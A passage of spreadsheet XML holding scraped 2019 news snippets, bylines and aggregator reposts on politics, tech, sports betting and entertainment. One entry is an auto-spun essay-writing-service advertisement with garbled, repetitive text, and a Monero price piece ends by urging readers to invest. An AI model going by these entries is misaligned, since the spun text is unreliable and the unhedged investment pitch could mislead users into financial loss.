you laugh.”</t>
  </si>
  <si>
    <t>The Braves do not need distractions from Ronald Acuna, Jr. What they need is a big effort from Game 2 starter Mike Foltynewicz. Source: Sports Business News</t>
  </si>
  <si>
    <t>An entirely predictable outcome to the announcement of US troop withdrawals from the region, perhaps even co-ordinated with it, Turkey’s military action in the north of Syria cannot be aimed at anybody other than the Kurdish forces which have done so much to rid the area of Isis influence. The combination of these actions can only lead to resentment on the part of the Kurds towards the US. (They already knew Turkey – at least Recep Tayyip Erdoğan’s Turkey – was an enemy.) Erdoğan has long regarded Kurds as adversaries because ethnic Kurds in South Turkey have for as long as I can remember sought for a degree of autonomy from the Government in Ankara. Some previous Turkish governments had had some sympathy to their requests but Erdoğan seems to deny any other ethnicity can exist within Turkey and regards everyone who lives within its borders as only being able to be Turkish. The Kurds also give him a handy scapegoat for any opposition in the south of Turkey to the central government. He calls them terrorists. His designation of north Syria as a “terror corridor” is clearly self-serving but may also be a prediction. I doubt the people living there – including those Syrians displaced there by the civil war in that country – will find Turkish rule any more benign than that of Bashar al-Assad. Erdoğan’s proposed invasion looks to me like a land grab, designed solely to increase Turkey’s territory. He probably intends never to withdraw from what is actually Syrian sovereign territory. Kurds have had the singular misfortune to live in an area of the world where their population is distributed over the territory of four different countries (not only Turkey and Syria but also Iran and Iraq) – and not had one of their own to call home. With the restraining hand of the US on Turkey removed, their outlook would seem to be bleak.</t>
  </si>
  <si>
    <t>Source: https://techcrunch.com/2019/09/30/twitter-launches-its-anti-abuse-filter-for-direct-messages/ Twitter launches its anti-abuse filter for Direct Messages Twitter is rolling out its spam and abuse filter for Direct Messages, a month and a half after the company announced it had started testing the feature. The filter will be available on Twitter’s iOS, Android and Web apps. The filter adds a new view to the Additional Messages inbox, where DMs from people you don’t follow go. If you click on it, messages that potentially contain offensive content also have their previews hidden, with an option to delete the message without opening it first. We tested, and turns out filters help you cut through the noise to find gems. Who knew. So we’re rolling out this filter to everyone on iOS, Android, and web! — Twitter Support (@TwitterSupport) September 30, 2019 The new DM filter is useful for people who want to keep their Twitter messages open, but (like most people) don’t want to see abusive content. The feature, however, feels long overdue considering that offensive messages are so common for users with open inboxes that third-party developers have launched their own filtering tools, including a recently-released plugin that detects and deletes dick pics. Earlier this month, Twitter also released its Hide Replies feature in the U.S. and Canada after testing it in Canada. It gives users the option of picking replies to a tweet to hide, but does not delete them. Instead, they are still visible in a separate view that is linked to a button in the original tweet. Source: https://techcrunch.com/2019/09/30/twitter-launches-its-anti-abuse-filter-for-direct-messages/ The post Twitter launches its anti-abuse filter for Direct Messages appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>MIDNIGHT MASSACRE: Visit the greatest horror-themed amusement park in the world this Halloween! Pre-order now on ComiXology! Pre-Order on comiXology! MIDNIGHT MASSACRE Writer(s): John Matsuya and Ben Matsuya Artist Name(s): Ben Matsuya (Pencils), Ben Matsuya (Colors) Cover Artist(s): Ben Matsuya (#1/#4), Jasen Smith (#2), Megan Huang (#3) Editors: Shawn Gabborin, Nicole D’Andria Color Assistant: Aaron Daly, Erin Fekete Fonts: Blambots Enjoy this Halloween with Action Lab: Danger Zone’s digital first premiere of John and Ben Matsuya’s MIDNIGHT MASSACRE! Halloween is here and so is Calico Adventure Park’s annual Halloween extravaganza “Midnight Massacre!” But when the corporate executives `conjure real monsters, all hell breaks loose… literally. It’s up to a jaded teenage employee to save the park and the world! For fans of Shaun of the Dead, Scott Pilgrim vs. The World, Adventureland and Cabin in the Woods, MIDNIGHT MASSACRE is a rollicking horror comedy guaranteed to scare you out of your quarter life crisis. Creators John and Ben Matsuya share: “MIDNIGHT MASSACRE combines all the fun of waiting in line at a theme park with a horde of marauding monsters! If you’re looking for a comedic romp about a girl who’s working the Halloween shift at the amusement park, wasting away her talents and her passions, that’s extremely specific of you… But also, exactly what MIDNIGHT MASSACRE is about! We’ve got the undead, punk rock, roller coasters, Halloween, thrills, romance, late stage capitalism, and maybe… just maybe a moral?” They go on to talk about how relatable MIDNIGHT MASSACRE can be for readers, thanks to their protagonist: “I hope Amy strikes a recognizable chord with the readers and inspires them to shake up the system. Amy is a strong teenager coming into her own. The kind of teen we see a lot in our real world, but not enough in our media. She is intelligent, but discounted; she is postmodern, ironic, and smart, but like many in our millennial generation, she falls for the false narrative that she is incapacitated by circumstances out of her control. We want to connect with younger readers through the adventure and the world we create, but also with more sophisticated readers through our satire and comedy.” The Matsuya brothers continue to share the world of MIDNIGHT MASSACRE with readers by saying: “If you’ve ever been stuck at a dead end job (which I’m sure all of us have had at some point), you feel like something is wrong; that the system isn’t working for you. How is your boss the dumbest person alive? How are the least qualified people tasked with the most amount of responsibility? Have you felt like you were meant to do something bigger?” They add, on a more personal note: “We have chosen to pursue creative endeavors, but following the recession we both took on jobs that put us in the stasis we describe (myself in a white collar workplace; my brother in the very same theme park position that Amy has). We’ve watched so many of our generation struggle to find work and acquiesce to the first open position, only to fall into a routine and see their dreams stunted by our economic reality. “We believe everyone who’s been in a job to “pay the bills” will feel an affinity with the struggles that Amy undergoes and take away the same message that she does: you aren’t just a cog. Be courageous. Follow your passion and fight for it. Don’t lose your sense of self and don’t let the system change you, change the system.” So, join jaded games employee and part-time rebel Amy Nicholson as she tries to save everyone from the nightmare that is the “Midnight Massacre” Halloween event at Calico Adventure Park. The complete story of MIDNIGHT MASSACRE will be on comiXology this month! Issues #1-2 release on 10/16 and issues #3-4 release on 10/30. And watch out next year for the physical trade collection! MIDNIGHT MASSACRE #2 Official Preview The post Preview: Midnight Massacre From Action Lab appeared first on 3 Million Years.</t>
  </si>
  <si>
    <t>Kath Sullivan</t>
  </si>
  <si>
    <t>Farmers are entitled to a new, one-off payment from the Federal Government to help them decide if their farm is sustainable or could be sold.</t>
  </si>
  <si>
    <t>Remex Express in Stratford Ontario is currently hiring qualified, experienced and professional Owner/Operators and company drivers to join our team. Our main service lanes are to MI, OH, KY, TN, GA, NC, SC, IN ,IL, WI, MO, MS, AR, IA, NE. All of our runs are consistent and repetitive. All freight is “no touch” freight .. Read more</t>
  </si>
  <si>
    <t>Jarrod Lucas</t>
  </si>
  <si>
    <t>Police say half a tonne of gold concentrate found in a Kalgoorlie man's backyard came from a commercial mine. The 48-year-old says he found it at the local rubbish tip.</t>
  </si>
  <si>
    <t>Weight loss: This is how pop sensation Samantha Fox stays looking so slim Weight loss: This is how pop sensation Samantha Fox stays looking so slim … she spent some time in the Celebrity Big Brother house, as well as featuring on Loose Women as a panellist. … No one's going to book a fat Sam Fox. Original Source Follow us on Twitter The post Weight loss: This is how pop sensation Samantha Fox stays looking so slim appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>After its failed IPO, the company's cash crunch has grown so acute that it needs new financing before the end of November to avoid running out of money, sources say.</t>
  </si>
  <si>
    <t>IT’S the almost invisible population in our city … but it’s booming.</t>
  </si>
  <si>
    <t>With us, you can get an essay, research paper or another work. Writing an essay is a rather easy and very tricky job, at the very same moment. If you may get your first purchase custom essay. There are a lot of online writing services out there, and it would not be possible to cover all them here. Now you understand that an honest and qualitative on-line essay writing service can offer great assistance for your learning, it’s time to set your purchase. It’s extremely important to read carefully https://writing-online.net/freshessays-com-review essay services reviews, because you would like to prevent low excellent services. Services, where you could come across expert essay writer online, are popular among the web. The One Thing to Do for Best Essay Writer Online Tell our experts what sort of homework help on the internet you will need to get. Essays on the internet is quite uncomplicated. There are a sizable choice of resources online where students can find term papers at no cost. Gif you can get in touch with the very best online. Furthermore, you might decide on any plan buy essay on the internet you require. Fortunately, now you don’t need to suffer alone it’s possible to order essay online and deal easily with the aforementioned difficulties. Whispered Best Essay Writer Online Secrets Employ the writers always adhere to a writer. If you discover that the writer did not provide https://writing-online.net/mhrwriter-co-uk-review precisely what you expected, request a revision, and we’ll make the corrections. Secondly, in order to receive reputation and earn more income, freelance writers are ready to accept any writing job. Study paper writing is among the precise difficult pursuits. It’s correct that not all writers out there are equally good, but time has demonstrated that low-qualified people don’t last on the industry. What’s more, essay writers are all set to deal with assignments of the most level of difficulty. Despite how sad it might sound, there aren’t any totally free essay writers, as nobody is ready to do homework for someone at no cost. Every writer on the team has passed a thorough screening approach. If you believe you are an extremely excellent writer, we have some excellent news for you. You may believe that our very best writers are so high-flying that there isn’t any chance for you to keep in contact with them during a paper writing process. Therefore, if you’re searching for a expert writer to complete paper assignments or merely to provide you a list of rather superior essay topic strategies for the newspaper we can do everything. Therefore, if you’re searching for a expert writer to complete paper assignments or simply to supply you with a list of rather terrific essay topic strategies for the newspaper we could do it all. Everyone might not be a fantastic writer although they’ve been good authors they will not locate adequate quantity of time to complete it. In the event that you encounter a writer’s block try utilizing essay debut generator to provide you with a couple of hints on the best method to proceed. You could also get in touch with your writer to supply some additional recommendations or request information regarding the order’s progress. So each time you hire our writer, the expert that’s best will keep working on your own essay. Dependent on the knowledge that the writer has pertaining to the subject, the info should be broken into parts and paragraphs. Taking into consideration the subject of your assignment, its degree of difficulty or length, our certified term paper writers have all the needed skills to create an outstanding project. Writing essays on the internet or buy research papers If you purchase essay from our essay. If you’re thinking that you require a person to compose my essay at the moment, you can merely rely on our honest reviews. It’s also wise to choose what kind of essay do you want to write. Anyhow, essays can be difficult to write. In terms of the before mentioned argument that students who didn’t compose the essay themselves will have a vague idea about what’s being discussed in class, it’s also quite far-fetched. In a nutshell, writing essay is among the most expressive methods for analyzing the language proficiency of an Urdu learner. Creating essays for nearly any level of school is truly a challenging position, and if your homework start to pile up, it might possibly capture. Things You Won’t Like About Best Essay Writer Online and Things You Will Generally do not worry everyone can afford to buy essays from us as our company provides generous discounts for each customer. It is very important to understand of how critical it may be to use totally free essays it is possible to discover online. Nowadays it is very difficult to find a trustworthy essay writing service. Nowadays it is quite difficult to locate a trustworthy essay writing service. A fantastic essay will ensure it’s possible you’ve got a particular great grade as a customary person is probably going to lead to some quality that will abandon you in the border of academic achievement. Make an essay won’t have any difficulty. Essays online is quite uncomplicated.</t>
  </si>
  <si>
    <t>Afterpay Touch has refused to reveal how much it will pay former US Treasury Secretary Larry Summers and other members of its newly-formed US advisory board.</t>
  </si>
  <si>
    <t>submitted by /u/glooviapp [link] [comments] I made an app Gloovi to help you create stories with interactive contents, which can boost viewer engagement!</t>
  </si>
  <si>
    <t>Alec Bruce</t>
  </si>
  <si>
    <t>If you live in one of Canada’s muscular metropolises, you might think about the Atlantic provinces once, maybe twice, a year. And when you do, you might be tempted to dismiss them as welfare states – unlike, say, Calgary. After all, most people “down home” draw unemployment at least half the year. They’re just as likely to sit around the house as lace up their boots. That’s why anyone with even a little gumption lives somewhere else in this country – like, say, Calgary. Of course, that doesn’t explain what people like Anya Waite are doing in Halifax. She’s an oceanographer who has spent most of her 30-year-career in New Zealand, Australia and Europe. Now, she’s running one of Canada’s more intriguing experiments in public-private sector collaborations: the Ocean Frontier Institute. As global warming has started the countdown on sustainable innovation in marine sciences – where practical applications already affect everything from offshore fisheries and aquaculture to transportation and renewable energy – the institute aims to cultivate the best, newest ideas for everyone, everywhere. “We’re trying to move ocean studies to a more useful place in the conversation,” Waite told me recently. “Historically, research is an ivory tower and we’re really working to break that down; to make the dialogue easier between academics and their potential stakeholders, which include governments, industries and communities. In fact, it won’t be easy and it certainly won’t be a straight line.” Apparently, Nova Scotia’s capital city is as good a place as any in the world to make that happen. Why not? She was born, raised and educated there. Move on down the coast a piece and you might meet a fellow who grew up in 1940s Apartheid South Africa, who became a Reuters news agency reporter covering the revolutionary bonfires of mid-20th century Latin America, who moved to the Toronto Telegram’s Moscow bureau during the iciest days of late-1960s Cold War mongering, who assumed the editorship of Canada’s most successful metropolitan magazine only to be slapped with a $102-million libel suit in the 1980s, and who has lived, since 1997, with his wife along a storm-lashed stretch of Nova Scotia’s South Shore. Living near Port Medway hasn’t seemed to hurt Marq de Villiers much. In fact, he told me following the national release of his latest book, Hell and Damnation: A Sinner’s Guide to Eternal Torment, “I have an idea for another one. I’m thinking about calling it The Longbow, the Schooner, and the Violin. It’s about wood. Actually, it’s about wood, commerce and art. And war.” Would he go away to write? “Why would I do that?” he blurts between bites of a truly excellent reuben sandwich, courtesy of the The Port Grocer restaurant, which overlooks a bay where rum-runners once ferried their booze. According to Aoife Mac Namara, “We have to get used to the unfamiliar.” She’s the new president of the Nova Scotia College of Art and Design in Halifax, and she knows what she’s talking about. Born in Amherst, N.S., but raised from the age of three in Ireland, she holds two master’s degrees and a PhD in fine arts. After a stint running Simon Fraser University’s Faculty of Communications, Art and Technology in Burnaby, B.C., she’s here. In fact, she’s always been a fan of the East Coast – not because it’s quaint, or slow, or lazy or anything else others in the rest of Canada might assume, but because it tends to defy expectations. “We all need to be open, to be empathetic, to learn, to collaborate,” she says. “That’s how we’re all going to be future-ready.” She’s talking about her university, of course, but she could be referring to the stereotypes that still afflict Canadians about other Canadians wherever they may live: Halifax, St. John’s, Charlottetown, Fredericton – even, say, Calgary. Alec Bruce is a Halifax journalist who writes about business, politics and social issues, and editor of Troy Media Partner news site The Bluenose Bulletin. © Troy Media The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post Embracing the unfamiliar down home appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>Claudia Jambor And Kevin Nguyen</t>
  </si>
  <si>
    <t>A NSW principal who used his high school's newsletter to attack climate activist Greta Thunberg also shared his views on Israel Folau and described abortion as "the barbarism of our time" in the bulletin.</t>
  </si>
  <si>
    <t>To paraphrase LeBron James: Even though people (including athletes, league commissioners and the general manager of the Houston Rockets) are entitled to their opinions, they should know their subject, and they should understand the ramifications of their words. That makes sense. Source: Sports Business News</t>
  </si>
  <si>
    <t>Virginia Credit Repair | (888) 630-5917 Virginia Free Credit Repair Counseling call (888) 630-5917 remove bankruptcy, free consumer report, fix bad credit, check your annual Equifax, TransUnion, Experian credit report. This Is the No. 1 Reason Millennials Struggle With Retirement SavingsSetting money aside for... Wednesday 09 October 2019 09:17 AM UTC-05 This Is the No. 1 Reason Millennials Struggle With Retirement Savings Setting money aside for retirement is no easy feat, especially when near-term bills monopolize your limited income. Such is the plight for a large …</t>
  </si>
  <si>
    <t>SwedishChef</t>
  </si>
  <si>
    <t>Looks like this deal is back. Echo Dot is our most popular voice-controlled speaker, now with improved sound and a new design. Ask Alexa to play music, answer questions, find recipes, read the news, check the weather, set alarms, control compatible smart home devices and more. Stream songs from Amazon Music, Apple Music, Spotify, TuneIn and others through the built-in speaker with a fuller sound. Services may require subscriptions or other fees. Instantly drop in on other rooms in your home or make an announcement to every room with an Echo. Make calls and send messages between supported Echo devices and the Alexa App. Alexa is always getting smarter and adding new features and skills, like Fitbit for tracking your fitness, NextThere for planning your commute, Sleep and Relaxation sounds for better sleep, and fun games for the family. With 4 far-field microphones, Alexa can hear you from across the room. And with compatible Echo devices in different rooms, you can fill your whole home with music. You can also connect to your own speakers over Bluetooth or with a 3.5 mm audio cable. Use your voice to turn on lights, adjust thermostats, control your TV and more, with compatible connected smart home devices.</t>
  </si>
  <si>
    <t>Tears from a hysterical tantrum stain the premiere of The Bachelorette when one creepy slimeball disses Angie and then fools her before framing an innocent gentlemen and pushing him to the brink of a meltdown.</t>
  </si>
  <si>
    <t>EL CAMINO is set after Breaking Bad, but will season 6 follow? Aaron Paul has spoken out. See full article at Telegraph.co.uk » The post El Camino: Will Breaking Bad season 6 follow? Aaron Paul SPEAKS OUT appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Photo: Charles LeClaire-USA TODAY Sports It’s time for the BTSC community to show they could cash in betting on NFL football games, this time deciding if teams will combine for a certain total score It is time for the Week 6 installment of BTSC Bookie! This is a chance for the BTSC community to collectively choose games in which to place an imaginary wager of “BTSC Bucks.” Each week I will remind everyone of the rules and explain an aspect of betting in order to further educate those interested about the process. Before I get into the procedure of things, I want to remind everyone that gambling addiction is a serous problem numerous people face. Like many things in life, gambling can be a fun and safe exercise if done in moderation, while obsessive gambling can have destructive and life-altering consequences. If you or anyone you know is suffering from a gambling addiction, help is available HERE. The Process We will start with $500 in BTSC Bucks for the season. If we bust, we may borrow from the BTSC Bookie, but will have to pay 20% interest each week it isn’t paid. It’s a steep price, but there are consequences to failure. All games this week will be betting the over/under point total. There will be 12 betting lines for users to place a vote. The values are as of Tuesday evening and they are locked in throughout the voting. The polls will run until Saturday night at 11:59 PM and the top three results will have wagers placed: $100 for the top choice, $50 for the second choice, and $25 for the third. A write-in campaign can be staged for voting. If any comment in the weekly article brings up a different game in the comments to make the wager and can receive enough recommendations to place it in the top three vote-wise, it will be calculated accordingly. I know it’s highly unlikely for a comment to receive that many recommendations, but if it does it will count. Thursday games will not be included due to obvious time constraints. All games may have the two opposing lines as an option. If so, only the higher vote-getter will be eligible for the wager. For example, if betting on the Steelers–Chargers game, if the over receives the most votes but the under receives the second most, he under will be ignored. Betting both for and against the Steelers will always be an option. Last Week’s Wager For Week 5, the majority of the users voted for the Steelers to beat the Ravens straight up since it was a nice payout if they could pull off the upset. The voting was very close between betting straight up versus against the spread. It was a tricky spread to bet against at 3.5 points. While betting the spread with $100 would have yeilded $90.91 in profit, the moneyline was $160 profit. Unfortunately, with a 3-point loss, it was the case where betting the spread would have paid off but instead the $100 was ripped from us much like the victory was ripped from the Steelers. As for the other two games, the $50 wager was a great payout which was on Arizona to defeat Cleveland at +155 which came in second place in the voting. Since the Cardinals won the game, we earned $77.50 in profit as well as gaining back out original $50. The Green Bay Packers vs. the Dallas Cowboys had a $25 wager on the Packers to keep the game within 3.5 points at the -110 payout. The Packers won the game straight up and we earned a payout of $22.73 above our original investment. If the bet against the spread and on the moneyline had been switched between the Packers and Steelers, we would have earned about $110 more. Instead, we lost the $100 in the Steelers game. So the more than $200 swing burns almost much like knowing the Steelers would be in the division lead if they had won on Sunday. In all, we earned a $100.23 profit on the second two games. Taking into account the loss in the first game, we just broke even with a $0.23 profit. Week 3 Balance: $755.55 Week 4 Net Gain/Loss: +$0.23 Week 4 Total: $755.78 Betting the Over/Under One other thing to consider while placing a bet is the option of betting on the total number of points scored by the two teams combined. To better understand, here is a rundown on betting the over/under according to Odsshark.com. What does OVER/UNDER Mean in Betting? OVER/UNDER betting is also called a totals bet. The total in any given sporting event is a combined score of both teams. The total for these games is an amount that is set by oddsmakers based on how they envision a game will unfold from a scoring perspective. As a bettor, you would need to select if the total number of points scored by both teams will be OVER or UNDER the set total. OVER/UNDER Explained A sports betting OVER/UNDER is a bet where you have to correctly predict the combined score of both teams. You have to pick if the total score will be lower or higher than the number set by oddsmakers – the people at betting sites who set the lines and odds. For example, let’s take a Philadelphia Eagles vs Dallas Cowboys game with the total set at 48.5 points. As a bettor, you would select if the game’s final score will be OVER 49 points or UNDER 48 points. At the sportsbook, the odds would be laid out like this: 48.5 OVER -110 48.5 UNDER +105 If you bet $50 on the OVER and the combined score was 56, you would get a payout of $95.45 – your original $50 comes back along with your $45.45 win. Conversely, if the game ended 27-20, that would be a pooled score of 47 points, meaning the game went UNDER. That same $50 bet on the winning UNDER would get you $102.50 – your first $50 plus your winnings of $52.50. Our Odds Calculator will give you an idea of how much you’d win based on the amount wagered. What if the Set Total is a Whole Number? Generally, totals betting lines are numbers ending with a half-point (.5), but in rare cases oddsmakers will predict that the total combined score will be a whole number. A PUSH in sports betting is when a total is a whole number like 48 points and the combined score hits it exactly. For instance, let’s pretend the Patriots are playing the Saints and the total is set at 48. If the final score is 28-20, that would be considered a PUSH since all points scored equal 48. The sportsbook you wagered with would refund your bet no matter if you selected UNDER or OVER in this matchup. Some bettors may feel that there is a larger advantage with betting on totals with a solid number instead of with a .5 as it provides an extra safety net to avoid losing your wager entirely. What if the Game Goes to Overtime? If a game goes to OT, it doesn’t change your bet. OVER/UNDER betting is just like any other bet where you are looking at the final score, whether the game ends in regulation or multiple overtimes. Although it’s often said that NFL overtime is an UNDER bettor’s worst enemy but an OVER bettor’s best friend, it’s important to remember that both teams get the chance to touch the ball. So, if the Rams get the ball first and score, the Chargers will get their chance too. Week 6 Options Here are the options chosen for the Week 4 betting exercise. Make sure you cast your vote in the poll. If you want to play your own game, leave your choices in the comments below and keep track of your total throughout the season. I’ve expanded the field to 12 entries to give the over and under option for six different games. For this week, payouts are listed in parenthesis, most of which are -110. As stated earlier, only one choice per game will have a wager. The nice thing about the over/under is the winner of the game is irrelevant, so you can be cheering either for more or less points. If you wish to vote for more than one, clear your “cookies” on your browser and vote again.</t>
  </si>
  <si>
    <t>Shanna McCarriston</t>
  </si>
  <si>
    <t>Nike is shutting down the Oregon Project. The long-distance running operation is shuttering after head coach and Olympic trainer Alberto Salazar was given a four-year doping ban. The US Anti-Doping Agency banned Salazar for “orchestrating and facilitating prohibited doping conduct” and “multiple anti-doping rule violations” after investigating the situation for four years. They accused him of trafficking testosterone and administering prohibited IV infusions to athletes. He is appealing the ban. Nike announced that a large reason the Oregon Project is shutting down is because they feel it has become an “unfair burden” on the athletes. A spokesperson told CNN that despite many athletes speaking up for the banned coach and their lack of finding any wrongdoing, they must follow the rules of the procedure. Salazar is unable to coach while the appeal is in process. They said (via: CNN)</t>
  </si>
  <si>
    <t>Source: https://techcrunch.com/2019/09/30/instagram-launches-a-creators-account-to-encourage-more-creation/ Instagram launches a ‘creators’ account to encourage more… creation Instagram deployed a new tool today that should help it continue to build a more viable alternative to YouTube for individual creators looking to try a different platform. It’s a dedicated account called @creators, which will deliver tips and tricks for people hoping to become more active on the platform. Based on the pinned FAQ story that Instagram has posted to the account, and a brief explainer with some testimonials from actual creators using the platform, one of the questions that Instagram answers is how to get verified — which must be asked so incredibly frequently by this particular set of folks. The grid posts of @creators include some helpful tips, like pointing out that 60% of people listen to stories on the platform with the sound on. Clearly, the account is geared toward pushing video creation tips and tools, which makes sense, given that’s an area of growth for the company, and a way for it to win over disaffected YouTubers and younger creators who are looking for their new home on the web. This could be a huge potential opportunity for Instagram, in fact, and this account, while a small part of an overall approach to wooing creators, is a good one. Source: https://techcrunch.com/2019/09/30/instagram-launches-a-creators-account-to-encourage-more-creation/ The post Instagram launches a ‘creators’ account to encourage more… creation appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>England head coach Eddie Jones fought back tears on Thursday as he paid tribute to his former coach at Randwick Jeff Sayle.</t>
  </si>
  <si>
    <t>The Queensland schools that get the least money from governments can be revealed.</t>
  </si>
  <si>
    <t>According to Royal LePage, migration from Lower Mainland continues to offset decreased demand from foreign nationals.</t>
  </si>
  <si>
    <t>Climate-change activists disrupted rail services in London, sparking a clash between angry commuters and a protester who had climbed onto the roof of a train during rush hour.</t>
  </si>
  <si>
    <t>Wednesday’s papers focus on the PM’s Brexit proposals and how any deal could be received by MPs. Read more? Click here</t>
  </si>
  <si>
    <t>Sarah Komadina</t>
  </si>
  <si>
    <t>Edmonton city council will soon consider allowing rows of tiny homes 2.4 metres apart as well as mobile styles.</t>
  </si>
  <si>
    <t>Slow Signings to Difficult Decisions: The Series of Poor Fortunes at Tottenham Hotspur Slow Signings to Difficult Decisions: The Series of Poor Fortunes at Tottenham Hotspur This post Slow Signings to Difficult Decisions: The Series of Poor Fortunes at Tottenham Hotspur appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>NBA Facilitating DeMarcus Cousins’ Surrender In Dom. Violence Case, Cops Say Original Source Exclusive TMZ.com 4:01 PM PT — Our NBA sources are adamant no one at the league office reached out to the Mobile Police Department. A Mobile PD spokesperson told us the NBA previously reaching out regarding DeMarcus Cousins turning himself in to police. NBA officials are working with the Mobile Police Dept. to coordinate a surrender date for DeMarcus Cousins in his domestic violence case, cops tell TMZ Sports. As we previously reported, Cousins is facing a 3rd-degree domestic violence charge in Alabama stemming from a threatening phone call he allegedly made on August 23 to the mother of his child. Cousins allegedly told his ex-girlfriend he’d put a “bullet in [her] f**king head” if she didn’t let their child come to his wedding, which took place in Atlanta the very next day. Play video content TMZSports.com An arrest warrant was issued for Cousins days later — but he had just undergone surgery to repair his torn ACL, which made it difficult for Boogie to travel to turn himself in. But, Cousins appeared in good spirits at Lakers Media Day last week — so we called the Mobile PD to see if there’s been any movement in that case. A spokesperson told us officials aren’t hunting down Cousins because he’s only facing a misdemeanor charge — but noted “The NBA has reached out to us” to facilitate an official surrender. We reached out to the NBA multiple times to find out why they’re getting involved but, so far, no word back. But, a source connected to the situation put it this way … a high-profile NBA player is involved in a high-profile criminal case. The NBA wants to make sure things don’t spiral out of control. We also reached out to Boogie’s camp for comment. So far, no word back.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NBA Facilitating DeMarcus Cousins’ Surrender In Dom. Violence Case, Cops Say appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>THE businessman who helped propel the English Premier League’s growth into a multibillion-dollar global giant is to advise the A-League clubs as they step into an independent future.</t>
  </si>
  <si>
    <t>In this May 29, 2019, file photo, a man uses his smartphone outside of a shop selling Huawei products at a shopping mall in Beijing. The New York Times reports the Trump administration plans to issue licenses to U.S. companies to supply “non-sensitive goods” to Chinese tech giant Huawei in a move that might help to cool tensions ahead of trade talks. (AP Photo/Mark Schiefelbein, File) Chinese telecom company Huawei has criticized the Estonian government and media for spreading what it says are “arbitrary and unfounded” allegations about cybersecurity risks related to the company’s mobile phones. Hong Yang, head of Huawei’s Baltic consumer business, said in a statement Tuesday that the company “is always ready to defend its rights and interests in a situation where any party is spreading baseless rumors and malicious libel.” He referred to an Estonian television program aired in September that discussed the issue in detail. In it, Foreign Trade and Technology Minister Kert Kingo spoke about alleged security risks with Huawei phones. It later was reported that Kinko used a Huawei handset as a work phone, and her ministry announced Wednesday that it has now been replaced by an Apple iPhone. China telecom giant Huawei hints US pressure hurting sales © 2019 The Associated Press. All rights reserved. Citation: Huawei lashes out at Estonia for ‘unfounded’ security claims (2019, October 15) retrieved 15 October 2019 from https://techxplore.com/news/2019-10-huawei-lashes-estonia-unfounded.html This document is subject to copyright. Apart from any fair dealing for the purpose of private study or research, no part may be reproduced without the written permission. The content is provided for information purposes only. READ SOURCE The post Huawei lashes out at Estonia for ‘unfounded’ security claims – Tech Xplore appeared first on BusinessTelegraph.</t>
  </si>
  <si>
    <t>Fun@Sea Motorboat Rentals in Keri, Zakynthos, Greece. Rent from the best motorboat rental place in Zakynthos! The guys at Fun@Sea are here to ensure you have a magical holiday by supplying you with top of the line boats to jet about the island on! If you need further information visit our website at www.zanteboatrentals.com, or […] The post Summer in Zakynthos!! Fun@Sea Boat Rentals – Zante as you've never seen it before!! appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>ABC has picked up the upcoming UK comedy Starstruck written, created by and starring New Zealander Rose Matafeo (Funny Girls, Squinters, Have You Been Paying Attention?). The 6 part series centres around 20-something Rose a millennial in London juggling two dead-end jobs and navigating the awkward morning-after-the-night-before when she discovers the complications of sleeping with a film star. Isobel Hughes, Avalon Television’s director of distribution, said: “It is brilliant to know audiences across the globe will be engaging with Starstruck and Rose Matafeo’s refreshing millennial voice.” Matafeo won Best Comedy Show at the prestigious Edinburgh Comedy Awards last year for her solo show Horndog. She has also performed at the New Zealand International Comedy Festival and the Melbourne Comedy Festival. Source: C21</t>
  </si>
  <si>
    <t>NotJustMusic</t>
  </si>
  <si>
    <t>Why should you choose "Not Just Music" NJM-29 Bluetooth Wireless Premium Earphone NOW: $29.25 ($39.00) Pure Rich HD Sound: Deliver Punchy and Rhythmic BASS for Music &amp; Perfect Clarity Calls Powerful Battery 16 Hours: 250 MAH Polymer Lithium-Ion Battery with 16 Hours Non-Stop Playing Time Ergonomic Stylish Premium Design: Designed for Efficiency &amp; Comfort Secure &amp; Comfortable Fit in your Ears: Comfortable all-day wear Tech Features: Advanced CSR Chipset, Waterproof IPX4, BT4.2 &amp; Passive Noise Cancellation Convenience: Integrated Microphone &amp; Convenient Controls, Hands-Free Call &amp; Easy to Use 100% Satisfaction Guaranteed: Premium Quality Earphone.</t>
  </si>
  <si>
    <t>Rhiannon Williams</t>
  </si>
  <si>
    <t>Knowing a whale's body mass can provide insight into how stress factors affect its survival and fertility The post Scientists accurately weigh living whales for the first time thanks to drones appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>submitted by /u/melonpicker [link] [comments] Apple pulls app used to track Hong Kong police movement</t>
  </si>
  <si>
    <t>Gabrielle Overton wants to see someone enjoy this historic Greenock property the same way her late brother, Bernard Clarke, did.</t>
  </si>
  <si>
    <t>Monero gets thumbs up on its advanced security features Monero is expected to cross newer price marks if the current market trend is improved. In the last 30-days, the highest recorded value of XMR was $82, and if the trend gets better the coin is expected to cross this value soon again. However, this is possible if XMR escalates to move past $70 in the next few days and rise to $75 before the month ends. The coin has been one of the most talked-about for its security features, and this gives it an edge against many current top players in the crypto market. Did you know that unilke Bitcoin and other assets, Monero has different key types? We explain the unique features of this privacy-focused cryptocurrency in our support article https://t.co/ZHM5nxODaE — Exodus (@exodus_io) October 2, 2019 XMR Price Analysis: As on October 4, 2019, at 09:08:36 UTC, the price of XMR token is noted to be $55.27, and it has recorded a dip of over 25% in the last 30 days. The coin moved from $73.85 to $81.28 in the first few days but then started dipping and fell up to $55 gradually. The lowest recorded value of Monero in the last 30-days was $53.91. It has recovered from that but may take some time to move past $70 again. XMR Chart By TradingView XMR started the year trading at $46, and it is currently moving almost 1.5X above this value. The coin’s highest recorded value in the last 90-days was $107, and it can be expected from XMR to cross $100 again before the year-end. This is an excellent time to start investing in the XMR token, as the coin may yield good benefits in the long run.</t>
  </si>
  <si>
    <t>Dave Gray Landscape Phoneography posted a photo: Recent Uploads tagged landscape</t>
  </si>
  <si>
    <t>The ASX has inched higher on the open, although the gains are muted compared to those seen on Wall Street.</t>
  </si>
  <si>
